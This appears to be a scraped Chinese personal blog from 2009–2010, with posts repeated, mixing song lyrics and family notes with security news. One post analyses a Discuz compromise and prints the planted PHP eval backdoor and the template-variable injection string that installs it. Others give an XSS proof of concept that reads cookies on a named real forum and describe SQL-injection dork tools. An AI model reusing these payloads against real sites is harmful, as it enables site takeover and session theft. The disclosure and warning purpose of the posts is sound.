推荐:《传奇》- 王菲
作者:ZhaoHuAn 日期:2010-02-17
—《传奇》
词:左右 曲:李键
引用内容
只因为在人群中多看了你一眼
再也没能忘掉你的容颜
梦想着偶然能有一天再相见
从此我开始孤单地思念
想你时你在天边
想你时你在眼前
想你时你在脑海
想你时你在心田
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
只因为在人群中多看了你一眼
再也没能忘掉你的容颜
梦想着偶然能有一天再相见
从此我开始孤单地思念
想你时你在天边
想你时你在眼前
想你时你在脑海
想你时你在心田
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
只因为在人群中多看了你一眼
王菲-传奇----录音室版【4.51 MB (4,737,985 字节)】
http://www.rayfile.com/zh-cn/files/3c4c3851-1a56-11df-9e4e-0015c55db73d/
王菲-传奇(Live) ----最好音质的现场版本下载【4.63 MB (4,858,469 字节)】<...
词:左右 曲:李键
引用内容只因为在人群中多看了你一眼
再也没能忘掉你的容颜
梦想着偶然能有一天再相见
从此我开始孤单地思念
想你时你在天边
想你时你在眼前
想你时你在脑海
想你时你在心田
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
只因为在人群中多看了你一眼
再也没能忘掉你的容颜
梦想着偶然能有一天再相见
从此我开始孤单地思念
想你时你在天边
想你时你在眼前
想你时你在脑海
想你时你在心田
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
宁愿相信我们前世有约
今生的爱情故事不会再改变
宁愿用这一生等你发现
我一直在你身边
从未走远
只因为在人群中多看了你一眼
王菲-传奇----录音室版【4.51 MB (4,737,985 字节)】
http://www.rayfile.com/zh-cn/files/3c4c3851-1a56-11df-9e4e-0015c55db73d/
王菲-传奇(Live) ----最好音质的现场版本下载【4.63 MB (4,858,469 字节)】<...
IDA Pro 5.5(+Hex-Rays Decompiler v1.1)
作者:ZhaoHuAn 日期:2009-12-19
R.I.P Str0ke is still alive:)
作者:ZhaoHuAn 日期:2009-11-05
引用内容"Hi,
I know by now that many of you have seen the story at...
http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.
Well, good news and bad news here.
Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.
Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that...
I know by now that many of you have seen the story at...
http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.
Well, good news and bad news here.
Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.
Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that...
Discuz 3rd Party攻击第三波出现了
作者:ZhaoHuAn 日期:2009-08-20
不知道又是哪个同学的杰作 初步预测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门
引用内容
/forumdata/cache/usergroup_0.php
程序代码
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
这个验证很YD啊。。
估计最近很多大站被黑都是出自这个东东吧~
使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
相关讨论:
警惕Third Party Content攻击
[url=http://discuz.net/viewthread.php?tid=1385006&extra=page%3D1&page=1]Discuz...
引用内容自定义模板变量:
变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
程序代码<?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?>
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
这个验证很YD啊。。
估计最近很多大站被黑都是出自这个东东吧~
使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
相关讨论:
警惕Third Party Content攻击
[url=http://discuz.net/viewthread.php?tid=1385006&extra=page%3D1&page=1]Discuz...
国内首家支持挂马查询—超级巡警安全中心上线
作者:ZhaoHuAn 日期:2009-07-11
最近AA总他们上线了一个新产品:http://a.sucop.com/ 支持一下!
近日,国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台,即“超级巡警安全中心”,该安全中心致力于对互联网整体安全状况进行评测,通过该安全中心的检测和评估,可为企业及个人用户提供权威准确的分析结果和防护病毒的措施,是目前国内第一款功能完备,性能强大,评价结果客观公正的网络安全评估平台。
目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能,通过这些检测,可以快速发现并提醒日常互联网访问中可能存在的危险站点。
link: http://wlj.me/index.php/2009/07/a-sucop-com/
近日,国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台,即“超级巡警安全中心”,该安全中心致力于对互联网整体安全状况进行评测,通过该安全中心的检测和评估,可为企业及个人用户提供权威准确的分析结果和防护病毒的措施,是目前国内第一款功能完备,性能强大,评价结果客观公正的网络安全评估平台。
目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能,通过这些检测,可以快速发现并提醒日常互联网访问中可能存在的危险站点。
link: http://wlj.me/index.php/2009/07/a-sucop-com/
milw0rm的镜像&程序
作者:ZhaoHuAn 日期:2009-07-09
前天听说milw0rm关闭了,真是个不幸的消息啊:(
今天上去找一个exp的时候,发现milw0rm已经打不开了,记得inj3ct0r以前自己做了个milw0rm的镜像,地址是http://inj3ct0r.com
貌似是目前国内能打开的一个数据还算比较完整的镜像站(要是有兄弟还有更好赶紧放出来吧 呵呵)
可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护,还有每天庞大的exploits要测试……
另外有兴趣的同学也可以YY个新的milw0rm出来~
程序在:
http://www.book.amjad.ws/save.php?action=save&id=41
数据库配置文件:
ozellikler.php
DB: milw0rm.sql
相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:)
PS:到上海了,14号到公司报到,这几个月实在是忙啊~
今天上去找一个exp的时候,发现milw0rm已经打不开了,记得inj3ct0r以前自己做了个milw0rm的镜像,地址是http://inj3ct0r.com
貌似是目前国内能打开的一个数据还算比较完整的镜像站(要是有兄弟还有更好赶紧放出来吧 呵呵)
可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护,还有每天庞大的exploits要测试……
另外有兴趣的同学也可以YY个新的milw0rm出来~
程序在:
http://www.book.amjad.ws/save.php?action=save&id=41
数据库配置文件:
ozellikler.php
DB: milw0rm.sql
相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:)
PS:到上海了,14号到公司报到,这几个月实在是忙啊~
SimpleDorkGUi & G-Injector
作者:ZhaoHuAn 日期:2009-05-30
顾名思义,就是通过搜索引擎定义关键字来自动查找注入点的工具。对于比较庞大、脚本种类比较复杂的大型站点做渗透有所帮助。例如:site:qq.com inurl:php?id=
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码 否则你将会看不到下面的操作工具栏;) */
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码txtField = Text(myFrame, font=('Verdana', 8, ''),fg='orange', bg='black', width=400, height=32, wrap=WORD, yscrollcommand=scb.set)
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
[MS09-012]Token Kidnapping 安全补丁(KB956572)
作者:ZhaoHuAn 日期:2009-04-20
去年win下最流行的一个本地提权的漏洞微软终于放出补丁了。。
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
Discuz <=7.0(frame.php) xss Vulnerability
作者:ZhaoHuAn 日期:2009-04-18
前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。
PoC:
程序代码
----->
跳转到了
程序代码
PoC:
程序代码http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>
----->
跳转到了
程序代码http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
摘一下老爸发的留言。
作者:ZhaoHuAn 日期:2009-04-09
(2009-04-09 20:55:21) 关耳
人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。
人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。
感谢朋友爱情证书和百度娱乐杨嘉~
